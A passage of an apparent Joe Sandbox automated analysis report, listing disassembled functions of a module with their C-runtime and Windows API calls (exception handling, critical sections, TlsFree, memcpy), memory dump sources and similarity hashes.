                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID: I
                                                                                                          • API String ID: 340685940-3707901625
                                                                                                          • Opcode ID: 760705c73c0248b8f69ae26ca550e92e93156c1ffba02e1602d02d4dce3a37b8
                                                                                                          • Instruction ID: 593c99ad07d1b9a98864f44414749702c0d002b6dc99758603e252f2526765f4
                                                                                                          • Opcode Fuzzy Hash: 760705c73c0248b8f69ae26ca550e92e93156c1ffba02e1602d02d4dce3a37b8
                                                                                                          • Instruction Fuzzy Hash: 33018671C0020ADBDF009FA9C8046DEBBB5FF44368F108615F534A61D0E775E611CBA4
                                                                                                          Function 6FD8BF74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??0exception@std@@QAE@ABQBDH@Z.MSVCR100(00000000,00000001,?,?,?,?,00000010), ref: 6FD8BF94
                                                                                                            • Part of subcall function 6FD8BE96: _malloc_crt.MSVCR100(00000054), ref: 6FD8BEFA
                                                                                                          • ??1exception@std@@UAE@XZ.MSVCR100 ref: 6FD8BFC5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@??1exception@std@@_malloc_crt
                                                                                                          • String ID: bad allocation
                                                                                                          • API String ID: 2462871298-2104205924
                                                                                                          • Opcode ID: 6d1fb6c9475f17a4fe61294274e54d2b52e2b7a8628644c4f525d7d7db46f8e4
                                                                                                          • Instruction ID: 19f356404e04d9ecc410cad90812f1985825cdcfd1f228a76e3e737d4982b6c5
                                                                                                          • Opcode Fuzzy Hash: 6d1fb6c9475f17a4fe61294274e54d2b52e2b7a8628644c4f525d7d7db46f8e4
                                                                                                          • Instruction Fuzzy Hash: DEF01275C0021EAFDB54DF90CC52BFEB738AF00714F504605E9306A2E0D7B92A068BA1
                                                                                                          Function 6FDBC4C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6FDBC51C), ref: 6FDBC4E0
                                                                                                          • _CxxThrowException.MSVCR100(00010000,6FE20C0C,6FDBC51C), ref: 6FDBC4F5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@ExceptionThrow
                                                                                                          • String ID: version
                                                                                                          • API String ID: 2684170311-3206337475
                                                                                                          • Opcode ID: e5f54a2f7482484619697ebcb94145da178d89f64530e4f81bcf3915d6fec7fc
                                                                                                          • Instruction ID: 5ab21aa5e22331a6a37da0e4b0f87c76d4f65a40aadabd119a08cdd57c0ad8a1
                                                                                                          • Opcode Fuzzy Hash: e5f54a2f7482484619697ebcb94145da178d89f64530e4f81bcf3915d6fec7fc
                                                                                                          • Instruction Fuzzy Hash: 99F01CB4404208BACB85DF55D442BCD7BA8AB94348F10C11EB85B9A180DB70B788CFA2
                                                                                                          Function 6FD8A48D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FDA889B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalEnterSection$_lock
                                                                                                          • String ID: h2o
                                                                                                          • API String ID: 1875928789-1123844877
                                                                                                          • Opcode ID: 6aea0fd35493ab335cbddb43e478cfe46fdda5e08add5ffe74635085896be84c
                                                                                                          • Instruction ID: e815038f32cefda5748247f1db3ecf2774ef0f27cbf1a6f5a05e5be6c3c537a5
                                                                                                          • Opcode Fuzzy Hash: 6aea0fd35493ab335cbddb43e478cfe46fdda5e08add5ffe74635085896be84c
                                                                                                          • Instruction Fuzzy Hash: 6BE0263260426037AB6C2B7C944AA8D7FC89A81260726465AED9E971C0DA66BD004AE9
                                                                                                          Function 6FDC4A13 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??0exception@std@@QAE@ABQBDH@Z.MSVCR100(7FFFFFFF,00000001), ref: 6FDC4A34
                                                                                                          • _CxxThrowException.MSVCR100(?,6FD8C888,7FFFFFFF,00000001), ref: 6FDC4A49
                                                                                                            • Part of subcall function 6FD986E8: RaiseException.KERNEL32(?,?,6FDAF30F,?,?,?,?,?,6FDAF30F,?,6FD8C888,6FE28518), ref: 6FD98727
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception$??0exception@std@@RaiseThrow
                                                                                                          • String ID: bad allocation
                                                                                                          • API String ID: 2887422211-2104205924
                                                                                                          • Opcode ID: 695a812be6643de0ce171523673ce4c67f0f564118a55dc740353dc6a9f2944e
                                                                                                          • Instruction ID: f7704f9caac2353f7b037e56bd180af1ee34b54c1bbf5569b4ee2504d18d6d80
                                                                                                          • Opcode Fuzzy Hash: 695a812be6643de0ce171523673ce4c67f0f564118a55dc740353dc6a9f2944e
                                                                                                          • Instruction Fuzzy Hash: 54E03975900308BBCB50DFA2C8519CD7B68EB84358F108255E8269B2D4DB30A2458BA1
                                                                                                          Function 6FD8A455 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _unlock.MSVCR100(?,?,6FDD6E42,00000040,6FDD6E31,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A485
                                                                                                            • Part of subcall function 6FD80934: LeaveCriticalSection.KERNEL32(?,6FD8A96B,0000000A,6FD8A9B4,?,6FD81EE5,0000000D), ref: 6FD80943
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,6FDD6E42,00000040,6FDD6E31,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FDA88B9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalLeaveSection$_unlock
                                                                                                          • String ID: h2o
                                                                                                          • API String ID: 203654640-1123844877
                                                                                                          • Opcode ID: f402037b3d15818d747e89c1f4e1d09a7acf206a4da08579afc6985d94d33666
                                                                                                          • Instruction ID: bcb1c81838c736ef2984c4ffa4df8cb40032f1307faa0de3c0c7b6a2d3b561d9
                                                                                                          • Opcode Fuzzy Hash: f402037b3d15818d747e89c1f4e1d09a7acf206a4da08579afc6985d94d33666
                                                                                                          • Instruction Fuzzy Hash: 30E0C273514345ABAB1807B9E88E95C3BDDAA844313294656F81CCB1C1DE22F4408C59
                                                                                                          Function 6FDC00D9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • TlsFree.KERNEL32(?,?,6FDCAB67,6FDC0EE0,?), ref: 6FDC00FF
                                                                                                          • TlsFree.KERNEL32(?,6FDCAB67,6FDC0EE0,?), ref: 6FDC010E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Free
                                                                                                          • String ID: \so
                                                                                                          • API String ID: 3978063606-3095705423
                                                                                                          • Opcode ID: 45e4cd27f98a2f76969d0a87c067f73a4d27df955423ad7e8c64a2ff1cd4bd22
                                                                                                          • Instruction ID: 5e09c5c3b483353612d1dcf9935f5119180ec5356e382ff7d657f5d59fc4c82e
                                                                                                          • Opcode Fuzzy Hash: 45e4cd27f98a2f76969d0a87c067f73a4d27df955423ad7e8c64a2ff1cd4bd22
                                                                                                          • Instruction Fuzzy Hash: 67E0DF3210A6118BEB8207288C087157FA1DBC7337F240307E02CC70F0EE286826CF85
                                                                                                          Function 6FE16501 Relevance: 5.1, APIs: 4, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • memcpy.MSVCR100(?,?,6FE167FA,?,?,?), ref: 6FE16570
                                                                                                          • memmove.MSVCR100(?,6FE16816,?,?,?,6FE167FA,?,?,?), ref: 6FE16585
                                                                                                          • memcpy.MSVCR100(?,?,6FE167FA,?,6FE16816,?,?,?,6FE167FA,?,?,?), ref: 6FE16595
                                                                                                          • memmove.MSVCR100(?,?,00000046,?,?), ref: 6FE165E4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpymemmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 167125708-0
                                                                                                          • Opcode ID: a6293e4dad3ae99d7d9577865dcc759ffa190ca09ab1077fdc6d0b8d85e66b4d
                                                                                                          • Instruction ID: e484b8d3f126e574c9e68d288363a7cdd472c20a7de9e3408b249088ed1ee638
                                                                                                          • Opcode Fuzzy Hash: a6293e4dad3ae99d7d9577865dcc759ffa190ca09ab1077fdc6d0b8d85e66b4d
                                                                                                          • Instruction Fuzzy Hash: 56310CB3610A045BD718CB65DD5299777E9EF84308B05852EE427DB284EA34FA45C750